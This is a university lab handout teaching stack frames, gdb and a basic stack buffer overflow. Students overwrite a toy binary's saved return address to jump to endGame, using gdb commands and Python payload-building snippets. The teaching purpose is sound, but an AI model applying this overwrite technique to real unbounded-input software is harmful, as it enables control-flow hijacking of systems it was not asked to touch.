Lab Due Date: Tuesday, September 6, 11:59 PM
Handy References
Lab 0 Goals
-
Use git to clone a repository full of starter code.
-
Practice writing C programs and refresh your understanding of the memory layout of a process.
-
Use GDB to identify and access functions, local variables, and function arguments on the stack.
-
Use GDB to map function calling conventions and x86 register values.
Overview
This lab explores the basics of reverse engineering and sets up the more advanced buffer overflow attacks in the following labs. This week we will work through a C program, compile it into assembly, and study the basics of stack layout.
Recall from CS 31 that the stack data structure is organized into units called frames.
-
Each stack frame maintains the invariant: %esp, the stack pointer, points to the top of the stack, and %ebp, the base (or frame) pointer, points to the bottom of the current frame.
-
Within each stack frame, we maintain state about the function, including local variables, the previous stack frame’s base address (the caller’s frame pointer), the address of the instruction to return to in the caller, and the function arguments.
In this lab we will use our understanding of the stack’s memory layout to explore how simple stack buffer overflows work.
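The frame layout described above can be sketched numerically. The snippet below is a minimal illustration, assuming a 32-bit x86 process that follows the usual cdecl convention and keeps a frame pointer (compilers may omit it when optimizing). The names `frame_layout` and `format_layout` are hypothetical helpers, and the %ebp value is only a sample; the addresses on your machine will differ.

```python
WORD = 4  # bytes per stack slot on 32-bit x86 (assumption)


def frame_layout(ebp, num_args=1):
    """Return {label: address} for the slots at and above %ebp."""
    layout = {
        "saved %ebp (caller's frame pointer)": ebp,
        "return address (saved %eip)": ebp + WORD,
    }
    # Arguments sit above the return address, first argument lowest.
    for i in range(num_args):
        layout["argument %d" % (i + 1)] = ebp + 2 * WORD + i * WORD
    return layout


def format_layout(layout):
    """Render the layout with the highest address first, like a stack drawing."""
    rows = sorted(layout.items(), key=lambda kv: kv[1], reverse=True)
    return "\n".join("0x%08x  %s" % (addr, label) for label, addr in rows)


# Sample %ebp value (an assumption for illustration only).
print(format_layout(frame_layout(0xFFFFD818, num_args=1)))
```

Local variables are not listed because their offsets depend on the compiler; they live at addresses below %ebp, which is why writing past the end of a local buffer moves toward the saved %ebp and the return address.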
Lab Requirements
You will be required to:
-
Understand the memory layout for fib.c and use gdb to answer the questions in lab0-worksheet.adoc.
-
Guess the secret code in main.c by deploying a basic buffer overflow attack.
-
Describe how and why your buffer overflow attack works in lab0-worksheet.adoc.
Getting your Lab0 Starting Point Code
Log into the CS88 GitHub for our class and get the SSH URL of your lab git repository. Follow along with the prompts below to SSH in, create a lab directory, and clone your lab repo. For a refresher on getting set up with git, take a look at Git Setup.
# ssh into our lab machines
ssh yourusername@lab.cs.swarthmore.edu
# create a cs88/labs sub-directory in your home directory
mkdir ~/cs88
cd cs88
mkdir labs
cd labs
# clone your lab0 repo into your labs sub-directory
git clone [your-ssh-URL]
# change directory to list its contents
cd lab0-you
# ls should list the following contents
ls
Makefile README.md lab0-worksheet.adoc fib.c secret main.c
If you have not yet been assigned a github account, please follow the instructions below to access lab0 code and to get started with the lab.
# create a cs88/labs sub-directory in your home directory
mkdir ~/cs88
cd ~/cs88
mkdir labs
cd labs
mkdir lab0-you
cd lab0-you
# copy the starter code into lab0-you
# USAGE: cp <source> <destination>
cp ~chaganti/public/cs88/lab0/* ./   # <-- the dot means "here" (the current directory)
ls
Makefile README.md lab0-worksheet.adoc main.c secret
Lab-0 Functionality
-
To get started with the lab, run make. You should now see a compiled binary fib along with secret. Run the following command to set executable permissions on secret: chmod +x secret. A successful attack on secret is shown below:
$ ./secret < attack
Enter secret number:
You are so wrong!
You win!
As you work through this lab it will be helpful to have the source code open in the editor of your choice, and a separate terminal window to run gdb.
-
Your first task is to use gdb to walk through fib and use the references provided on this lab page to answer the questions in lab0-worksheet.adoc. Here are some basic gdb commands to get you started:
gdb fib               # runs the gdb debugger on fib
break main            # sets a breakpoint in main
break 4               # sets a breakpoint on line 4
run                   # runs the code and stops at the first breakpoint
info break            # displays a list of breakpoints
Example:
Num Type       Disp Enb Address    What
1   breakpoint keep y   0x0000120e in main at fib.c:17
2   breakpoint keep y   0x000011ae in f at fib.c:4
disas main            # disassembly for main
info reg              # shows the registers and their values
info reg esp ebp eip  # shows specific registers
Example:
esp 0xffffd810 0xffffd810
ebp 0xffffd818 0xffffd818
eip 0x565561ae 0x565561ae <f+17>
info frame            # information about the current frame
help info frame       # provides the "man" page equivalent for the command
-
You can also run a single gdb command in a separate terminal window to view the output of disas. Open a new terminal window and run one of the following commands.
# command to view assembly from functions main and f in file fib.c
gdb -batch -ex 'file fib' -ex "disassemble main" -ex "disassemble f"
# command to view assembly from function main in file fib.c
gdb -batch -ex 'file fib' -ex "disassemble main"
# command to view assembly from function main in file secret
gdb -batch -ex 'file secret' -ex "disassemble main"
There are many more examples in the readings above; walk through those readings to answer the questions in the worksheet.
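If you find yourself retyping the batch commands for different functions, they can be assembled programmatically. The sketch below is only a convenience wrapper around the `gdb -batch -ex ...` invocations shown above; the helper names `gdb_disassemble_cmd` and `disassemble` are hypothetical, and it assumes Python 3.7 or later with gdb available on your PATH.

```python
import subprocess


def gdb_disassemble_cmd(binary, functions):
    """Build the argument list for a one-shot gdb disassembly run."""
    cmd = ["gdb", "-batch", "-ex", "file %s" % binary]
    for name in functions:
        cmd += ["-ex", "disassemble %s" % name]
    return cmd


def disassemble(binary, functions):
    """Run gdb in batch mode and return its output as text.

    Raises subprocess.CalledProcessError if gdb exits with an error.
    """
    result = subprocess.run(
        gdb_disassemble_cmd(binary, functions),
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


# Example (not executed here because it needs gdb and the fib binary):
#   print(disassemble("fib", ["main", "f"]))
```

Saving the returned text to a file gives you a copy of the assembly to annotate while you step through the program in a separate gdb session.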
Simple Buffer Overflow
Once you are familiar with the workings of fib.c you should be ready to move on to secret.
For the second part of the lab, you are provided with a compiled binary secret that is called by main. Your job is to get to endGame() without losing. To do so, you will have to either provide input that correctly guesses the secret string and the correct secret value or, as a savvy reverse engineering hack, bypass all of the code and force the program to execute endGame.
To see how secret works let’s run it with some arbitrary user input:
$ ./secret
Enter secret number:
1
You are so wrong!
Unfortunately, we don’t have the source code for secret (that would make this task trivial). But we do have main, which calls functions defined in secret. Looking at main, we see that it reads its input into a char array buf that is 12 characters long and performs some operations on this buffer before calling endGame.
-
Naive Approach: Your first task is to use gdb to figure out what the functions getSecretCode and calculateValue do. Use gdb to walk through each function and figure out at a high level what it does.
-
Security Mindset: In this task, you decide to be smarter and find loopholes or vulnerabilities in the code that you can take advantage of to get past the checks, reach endGame, and succeed.
-
Notice that one of the first instructions in main is the call to scanf. If you type man scanf in the terminal, you will notice that scanf does not limit the length of the string it takes as input unless the format string asks it to!
-
You can now leverage this: enter a secret number that far exceeds the length of buf and see the results. If you see a segmentation fault, you are on the right track! You’ve effectively overflowed the buffer into neighboring regions of memory (in this case, stack memory located at higher addresses) and corrupted the state of the frame, causing the program to segfault.
$ ./secret
Enter secret number:
1233943249324320948234091238401923874129348710329587495
You are so wrong!
Segmentation fault (core dumped)
-
Since our goal is not simply to crash the program but to manipulate it into winning, we can be smarter about the data we put in our input. We can overflow the stack so that when we reach the saved eip (the return address stored on the stack), we overwrite it with the address of the first instruction of endGame.
-
To accomplish this, let’s first run secret in gdb with twelve 1s as input. To automate the process of creating inputs, we can use a python command to help us out: python -c 'print("1"*12)' > allOnes.
-
In gdb you can redirect this input when you run secret as follows:
$ gdb secret
(gdb) break main
Breakpoint 1 at 0x8048575
(gdb) run < allOnes
Breakpoint 1, 0x08048575 in main ()
(gdb)
You can now try to put a breakpoint right after the call to scanf to confirm that our input of all 1s is in memory. Hint: Try using the examine command x/20w $esp to view 20 words at the top of the stack.
-
Once you figure out the starting address of the array buf, you can calculate the distance from this memory address to the location of the saved eip on the stack. If we manage to overwrite the saved eip so that it points to endGame, then we have successfully launched a buffer overflow attack!
-
Note: To place a memory address in our secret number and change the saved value of eip, we need to account for the fact that x86 CPUs store multi-byte values such as memory addresses in little-endian format, i.e. from the least-significant byte (the "little end") to the most-significant byte at consecutive, increasing addresses.
-
Therefore, if we wanted to store a memory address of 0xabcdefgh in our buffer following a string of twelve 1s, we would use the following command (Python 2 syntax): python -c 'print "1"*12 + "\xgh\xef\xcd\xab"' > attack.
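The last few steps (measuring the distance from buf to the saved eip, then appending the target address in little-endian order) can be sketched in Python 3. This is an illustration under stated assumptions, not the solution: the three addresses below are made-up placeholders that you must replace with values you find in gdb, and the helper names are hypothetical. Note that in Python 3 the payload has to be written as bytes; printing a str containing "\x.." escapes would re-encode bytes above 0x7f.

```python
import struct


def return_address_offset(buf_addr, saved_eip_addr):
    """Number of filler bytes between buf[0] and the saved return address."""
    if saved_eip_addr <= buf_addr:
        raise ValueError("saved return address should sit above buf on the stack")
    return saved_eip_addr - buf_addr


def build_payload(offset, target_addr, filler=b"1"):
    """offset filler bytes, then target_addr packed as 4 little-endian bytes."""
    return filler * offset + struct.pack("<I", target_addr)


def write_payload(path, payload):
    """Write the raw bytes plus a trailing newline, as print would add."""
    with open(path, "wb") as f:
        f.write(payload + b"\n")


# Placeholder values for illustration only; they are NOT taken from secret.
BUF_ADDR = 0xFFFFD7F0        # hypothetical address of buf[0]
SAVED_EIP_ADDR = 0xFFFFD80C  # hypothetical stack slot holding the return address
TARGET_ADDR = 0x0804851B     # hypothetical address of endGame

offset = return_address_offset(BUF_ADDR, SAVED_EIP_ADDR)
payload = build_payload(offset, TARGET_ADDR)
print(offset, payload)
# To create the input file: write_payload("attack", payload)
```

One caveat, assuming main reads its input with a `%s` conversion: scanf stops at whitespace, so a target address containing a whitespace byte such as 0x20 or 0x0a would cut the input short.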
Miscellaneous hints
Good systems programming and reverse engineering involve the following steps:
1. Use gdb to incrementally walk through your code and provide input.
2. Use a piece of paper to draw out the stack.
3. Locate the addresses on the stack.
4. Repeat from step 1.
-
To rerun the code in gdb, you can simply call run again rather than quitting gdb; gdb will restart the program from the beginning with your breakpoints preserved.
-
You can also change the values of variables during execution in gdb using (gdb) set {int}0xfffff = 3.
Grading Rubric
Total: 30 points
-
10 points for successfully causing a buffer overflow in secret.
-
20 points for completing the worksheet.
Submitting
Please remove any debugging output prior to submitting.
To submit your code, simply commit your changes locally using git add and git commit. Then run git push while in your lab directory.